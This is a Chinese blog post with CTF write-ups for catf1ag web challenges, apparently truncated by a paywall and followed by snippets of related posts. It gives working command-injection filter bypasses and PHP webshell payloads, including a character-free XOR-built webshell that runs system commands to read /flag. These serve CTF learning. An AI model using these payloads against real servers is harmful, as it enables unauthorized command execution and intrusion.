catf1ag Web writeup(wp) 可能会持续更新

最新推荐文章于 2023-12-09 16:52:31 发布
最新推荐文章于 2023-12-09 16:52:31 发布
阅读量281 收藏
点赞数
分类专栏: 前端 html 面试 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54850952/article/details/123079503
版权

文章目录

命令执行之我在干什么

换行绕过strstr,%09绕空格
a=yyds%0als%09/
看见flag在根目录,但是过滤了*和flag
用正则

?a=yyds%0Anl%09/fla[g]

签到题

源代码

webshell

网站被黑了,发现robots.txt,访问里面的地址,源代码有个aGFja2Vy
base解码得到hacker
于是传

webshe11.php?hacker=system('cat /flag');

其次,我发现扫描有一个1.txt,直接访问就是flag,应该是哪位好心人写的。
所以我也好心的删掉了。

无字符webshell

过滤A-Za-z0-9
参考浅析无字符数字构造webshell
采用里面的异或,即

$_="`{
  {
  {"^"?<>/";${$_}[_](${$_}[__]);
#$_GET[_]($_GET[__])

于是得到最终payload

?cmd=$_="`{
  {
  {"^"?<>/";${$_}[_](${$_}[__]);&_=assert&__=system('tac /flag');

当然如果你是在我写wp之前做的,你会发现这道题直接访问flag.txt就可以拿到flag了,而我看我以前的payload是tac f111ag。
为了继续当好心人,我就好心的mv flag.txt /flag,这样大家就能学习到无字符webs

最低0.47元/天 解锁文章
Forpear
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF之一天一题:攻防世界的web进阶之Cat
qq_42728977的博客
08-27 1498
这个题做的还是太明白,看了许多wp。在此小记录一下。 题目这个鸭子,看到以为是sql注入,但又看是输入域名,然后返回ping的结果,又像是命令执行漏洞,于是各种姿势试,无果。开始看wp。 大佬们是先fuzz一波,发现当url=@的时候报错,而@的的url编码是%80, ...
CATcat_wp_web flask 和华夏erp
DoubleLiii的博客
02-01 571
ctf
CATCTF wp
wha1e的博客
01-03 3238
总体感觉一般,做题体验不是很好,不过也算是近期比较认真的打的一场比赛。
RCE绕过之无参数RCE
Ciyaso的博客
07-23 1384
什么是无参数函数RCE 我们常用eval($_GET['code']);来实现一句换木马和getshell 但是如果开发者进行了过滤 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 那么我们就无法使用参数,也就无法通过正则的校验 在此过滤条件下我们只能执行如下格式的函数 a(); a(b()); 不可使用 a('abc'); ①getenv() 使用get
天权信安杯 catf1ag CTF 2022 题目
12-09
天权信安杯 catf1ag CTF 2022 题目。除了Web,其他类型的题目基本上都下载了。
CatF MT4指标模板
09-28
4. **自定义指标**:CatF模板可能还包括了一些专为该系统开发的自定义指标,这些指标可能结合了多种分析方法,提供独特的市场见解。自定义指标可以是开发者对现有技术的改进,或者全新的交易理念的体现。 5. **交易...
web和pwn题的简单动态flag实现
qq_52820087的博客
11-14 4534
作为一个出题人需要有一些觉悟,这周花了三天时间去研究Dockerfile的写法,主要还是为了实现动态flag,思路理顺了就发现,原来Dockerfile和动态flag这么简单,这里直接现写两个简单的题目来演示一下。使用build命令,构建题目镜像,name为dockerhub名(自行注册登录),webtest为镜像名(自定义),"."为版本号,代表latest,也可以自定义,不过拉取时记得加上版本号。把"start.sh"改为"flag.sh",以下为flag.sh的具体内容。
Catf1agCTF-WEB签到
最新发布
m0_73734159的博客
12-09 441
flag{give_you_false_flag}给你假的flag。考虑到此平台大多flag格式都是catf1ag。猜测出题人把正确的flag进行反转了。最后猜测到一个非常有意思的出题方式。果不其然将正确的flag进行了反转。既然出题人说了有flag的存在。结果都没有发现flag的存在。毕竟是签到题也不要想太麻烦。那么就斗胆搜索此关键字。
信工院赛WP
qq_51425032的博客
05-27 384
Web babyphp 首先第一步由题目可知该题与PHP有关,随后进入网址 第二步,进入网址打开源码进行代码审计 可知想得到flag,必须要是SHA1()与SHA1()中的值即为name和password经过sha1()函数后一样,经过查资料可得,要绕开sha1()函数,需使用数组类型的参数 第三步,随即在网址输入框中输入/challenge.php?name[]=a&password[]=b进行传参就可以绕过sha1函数得到flag 逆转思维 首先第一步观察题目“逆转思维..
2023CTFSHOW愚人杯部分WP
qq_42585535的博客
04-04 672
call_user_func**来RCE。
catf1ag web题目 WriteUp(wp)
Anton1a的博客
01-16 7696
catf1ag web题目 WriteUp
NepCTF2022 WP
Pysnow's Blog
07-20 1821
NepCTFWriteUp
2021-02-10
m0_53314778的博客
02-10 232
【WUST-CTF2020】朴实无华 考点: intval()函数科学计数法绕过 网页Unicode编码 变量md5()加密后与原值相等 nl、tac等替代cat命令 启动靶机: 看到标签名: bot字眼,猜测可能有robots.txt协议,访问: 写着fake_flag,得到假的flag: 根据之前的Warning:猜测和请求头有关,使用BurpSuite抓取数据包: 在Response中发现新的提示:`Look_at_me: /fl4g.php 或者: F12看了看网络包,在响应头里,发现有一个lo
【ctf.show-web赛题】
一纸荒芜的博客
03-21 2099
主要分享自己做题的心得和积累,共勉之。
catf1ag CTF刷题1(比较入门)
weixin_63231007的博客
05-09 898
1. 变量覆盖_extract _extract函数存在变量覆盖,因此再get传入_init_str=6即可满足条件 2. 等于False md5()函数存在漏洞,传入为数组时,报错返回NULL值,满足==0 3. 啥都没了 主机关机了,以为啥都没了,没想到。。。肯定是备份考察 index.php.bak index.php.swp 发现.index.php.swp下载的文件里flag 4. 文件包含 题目说了是文件包含漏洞。发现?file=参数,查看源码得知flag所在文件.
2022虎符网络安全CTF部分wp(2)
没事我溜达
03-22 2381
Web | babysql 进入靶场查看限制,发现账号不过滤单引号,然后开始对密码进行尝试。 后面使用like函数,用like函数爆出两位特殊字符后,就开始爆剩下的字符了。 通过盲注,来不断猜测字符。最后得出密码为:m52fpldxyylb^eizar!8gxh$ payload:username=a%27||`password`like%27m52§6§%25%27%26%26`id`=%271%27||`password`regexp'[&password=1 like不
catflag-web-wp部分(填坑)
开心星人的博客
03-25 4841
目录web签到webshell命令执行之我在哪int命令执行《我的女友是机器人》变量覆盖_extract等于False文件包含strcmp什么?有后门命令执行之我是谁小矛盾命令执行之我在干什么 web签到题 进入页面,一片空白,查看源码 webshell 源码,状态包什么都看了,没找到 啥都没了,猜猜应该是目录扫描 扫一下 webshe11.php是白板,查看源码得到 解码得到hacker 应该是一句话木马的密码 cat看一下,没有找着(可以直接用菜刀连) 查看根目录 有了 命令执行之我在哪

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值